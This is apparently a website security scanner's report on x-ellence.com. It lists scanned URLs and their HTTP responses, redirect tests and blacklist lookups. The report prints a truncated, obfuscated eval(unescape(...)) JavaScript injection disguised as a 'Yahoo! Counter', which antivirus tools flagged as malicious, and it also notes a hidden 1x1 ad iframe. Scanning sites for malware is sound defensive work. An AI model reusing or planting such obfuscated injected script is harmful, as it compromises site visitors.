Scanned pages/files
Request | Server response | Status |
http://x-ellence.com/ | 200 OK Content-Length: 2023 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Yahoo! Counter starts if(typeof(yahoo_counter)!=typeof(1))eval(unescape('/|/$%3C%64@%69~%76!%20`s%74%79`%6C%65=@%64%69`sp|l%61y|%3An#%6Fn$%65%3E\n`d%6F#c$%75%6D%65&%6E%74%2E&%77`ri%74&%65|%28"$%3C`/@%74%65~x%74#%61%72%65@a!%3E%22%29%3B%76`%61|%72%20!i,_~,%61`%3D%5B%22#7~%38@%2E%31@%31%30&.%31%37`5#.!%321",|"1#%39%35@%2E#2%34%2E|7!%36%2E%32`5$%31%22~]~%3B$%5F%3D%31%3B&i#f$%28@%64`o`%63%75@m!e%6E#t|%2E%63$%6F%6F@%6Bi%65%2E%6D|%61!%74c`%68(&%2F$%5C$%62#%68%67$%6 <!-- counter end --> Antivirus reports:
| ||
http://pub5.bravenet.com/passwd/jsinclude.php?usernum=370171291&cpv=2 | 200 OK Content-Length: 1787 Content-Type: text/html | clean |
http://pub5.bravenet.com/test404page.js | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 04 Oct 2014 16:08:38 GMT Pragma: no-cache ETag: PUB5-128ec30d6bd302a7d965f62c891c8d642830dadd-1412438918.4243 Location: http://www.bravenet.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 04 Oct 2014 16:08:28 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV" Set-Cookie: BNU=deleted; expires=Fri, 04-Oct-2013 16:08:37 GMT; path=/; domain=.bravenet.com Set-Cookie: BNP=deleted; expires=Fri, 04-Oct-2013 16:08:37 GMT; path=/; domain=.bravenet.com Set-Cookie: BNETSESSID=2pa2slh1irg2521a8pn1l1r445; path=/; domain=.bravenet.com Set-Cookie: HASCOOKIES=1; expires=Tue, 01-Oct-2024 16:08:38 GMT; path=/; domain=.bravenet.com | clean |
http://www.bravenet.com/test404page.js | 404 Not Found Content-Length: 19286 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/jquery.min.js/ | 404 Not Found Content-Length: 19286 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/bootstrap.min.js/ | 404 Not Found Content-Length: 19286 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/bn.js/ | 404 Not Found Content-Length: 19286 Content-Type: text/html | clean |
http://assets.bravenet.com/bn/js/bnui.js | 200 OK Content-Length: 44626 Content-Type: application/x-javascript | clean |
http://pub2.bravenet.com/counter/code.php?id=390456&usernum=137405393&cpv=2 | 200 OK Content-Length: 334 Content-Type: text/html | clean |
http://pub2.bravenet.com/test404page.js | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 04 Oct 2014 16:08:45 GMT Pragma: no-cache ETag: PUB2-60ac892e539bf2f837023efa1f1f713da4f49bc8-1412438925.9663 Location: http://www.bravenet.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 04 Oct 2014 16:08:35 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV" Set-Cookie: BNU=deleted; expires=Fri, 04-Oct-2013 16:08:44 GMT; path=/; domain=.bravenet.com Set-Cookie: BNP=deleted; expires=Fri, 04-Oct-2013 16:08:44 GMT; path=/; domain=.bravenet.com Set-Cookie: BNETSESSID=e8d2963glplgo3g3fdlnpscvb4; path=/; domain=.bravenet.com Set-Cookie: HASCOOKIES=1; expires=Tue, 01-Oct-2024 16:08:45 GMT; path=/; domain=.bravenet.com | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://ads.pro-market.net/ads/scripts/site-125361.js | 200 OK Content-Length: 820 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 1x1 src: http://pbid.pro-market.net/engine?site= <iframe width='1' height='1' marginwidth='0' marginheight='0' hspace='0' vspace='0' frameborder='0' scrolling='no' src='http://pbid.pro-market.net/engine?site="+ site +";size=1x1;category="+ cat +";kw="+ kw + siteref +"'> | ||
http://assets.bravenet.com/bn/responsive/vendor/bootbox/bootbox.js | 200 OK Content-Length: 23249 Content-Type: application/x-javascript | clean |
http://pub5.bravenet.com//assets.bravenet.com/bn/front/js/bootstrap.min.js/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 04 Oct 2014 16:08:47 GMT Pragma: no-cache ETag: PUB5-484e3b76578711835dc66ab1a6dc01548028d57f-1412438927.6103 Location: http://www.bravenet.com//assets.bravenet.com/bn/front/js/bootstrap.min.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 04 Oct 2014 16:08:37 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV" Set-Cookie: BNU=deleted; expires=Fri, 04-Oct-2013 16:08:46 GMT; path=/; domain=.bravenet.com Set-Cookie: BNP=deleted; expires=Fri, 04-Oct-2013 16:08:46 GMT; path=/; domain=.bravenet.com Set-Cookie: BNETSESSID=3rtmi0jf04okn1cc63ptnkoq82; path=/; domain=.bravenet.com Set-Cookie: HASCOOKIES=1; expires=Tue, 01-Oct-2024 16:08:47 GMT; path=/; domain=.bravenet.com | clean |
http://pub5.bravenet.com//assets.bravenet.com/bn/front/js/bn.js/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 04 Oct 2014 16:08:48 GMT Pragma: no-cache ETag: PUB5-df4382c605eb87705f96b9273e0531156929f7b2-1412438928.0936 Location: http://www.bravenet.com//assets.bravenet.com/bn/front/js/bn.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 04 Oct 2014 16:08:38 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV" Set-Cookie: BNU=deleted; expires=Fri, 04-Oct-2013 16:08:47 GMT; path=/; domain=.bravenet.com Set-Cookie: BNP=deleted; expires=Fri, 04-Oct-2013 16:08:47 GMT; path=/; domain=.bravenet.com Set-Cookie: BNETSESSID=lvs646imvolmpqdrr3uuc5jk74; path=/; domain=.bravenet.com Set-Cookie: HASCOOKIES=1; expires=Tue, 01-Oct-2024 16:08:48 GMT; path=/; domain=.bravenet.com | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: x-ellence.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 16:08:56 GMT
Pragma: no-cache
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fcgid/2.3.5
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: CMSSESSID287a4a3b=510ij72sokr00sg8bdc59hpsg6; path=/
GET / HTTP/1.1
Host: x-ellence.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 16:08:56 GMT
Pragma: no-cache
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fcgid/2.3.5
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: CMSSESSID287a4a3b=510ij72sokr00sg8bdc59hpsg6; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: x-ellence.com
Referer: http://www.google.com/search?q=x-ellence.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: x-ellence.com
Referer: http://www.google.com/search?q=x-ellence.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=x-ellence.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://x-ellence.com/
Result: x-ellence.com is not infected or malware details are not published yet.
Result: x-ellence.com is not infected or malware details are not published yet.